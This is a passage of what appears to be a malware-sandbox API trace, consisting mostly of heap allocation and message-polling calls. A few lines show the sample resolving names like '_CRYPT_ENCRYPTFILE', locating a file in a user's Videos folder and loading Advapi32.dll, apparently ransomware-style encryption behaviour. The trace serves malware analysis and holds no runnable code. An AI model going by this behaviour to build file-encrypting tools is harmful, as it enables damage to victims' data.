hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0096.999] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c08 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9de8 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0096.999] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2500 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2500 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0097.000] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2420 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d58 [0097.000] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d58 | out: hHeap=0x1780000) returned 1 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24e0 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0097.000] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.000] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e310 [0097.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0097.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0097.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0097.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23d0 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2420 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0097.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2420 | out: hHeap=0x1780000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2420 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0097.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0097.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0097.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0097.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0097.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9da0 | out: hHeap=0x1780000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c08 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2500 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca070 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0097.002] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2440 [0097.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ec0 [0097.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fc8 | out: hHeap=0x1780000) returned 1 [0097.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fc8 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca040 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0097.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0097.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca088 | out: hHeap=0x1780000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f20 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca088 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0097.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9fe0 | out: hHeap=0x1780000) returned 1 [0097.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0097.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9fe0 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0097.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0097.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0097.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.005] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\96vXR96flJJML\\1OjHCE.swf", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cc0a970, ftCreationTime.dwHighDateTime=0x1d5e53f, ftLastAccessTime.dwLowDateTime=0xde15b0f0, ftLastAccessTime.dwHighDateTime=0x1d5eaa3, ftLastWriteTime.dwLowDateTime=0xde15b0f0, ftLastWriteTime.dwHighDateTime=0x1d5eaa3, nFileSizeHigh=0x0, nFileSizeLow=0xfb9f, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="1OjHCE.swf", cAlternateFileName="")) returned 0x41ac540 [0097.005] FindClose (in: hFindFile=0x41ac540 | out: hFindFile=0x41ac540) returned 1 [0097.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9f38 | out: hHeap=0x1780000) returned 1 [0097.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ff8 | out: hHeap=0x1780000) returned 1 [0097.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ff8 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0097.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca010 | out: hHeap=0x1780000) returned 1 [0097.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca010 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0097.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0a0 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0a0 | out: hHeap=0x1780000) returned 1 [0097.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.006] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.006] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0097.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0097.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0a0 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0097.006] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0097.006] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0097.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0097.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca0b8 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0097.006] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0097.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0097.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0097.007] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0b8 | out: hHeap=0x1780000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0b8 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0097.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0097.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0e8 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0097.008] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0d0 | out: hHeap=0x1780000) returned 1 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0097.008] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0097.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0097.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0097.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0097.008] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0097.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0097.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0097.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0097.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0097.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0097.009] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 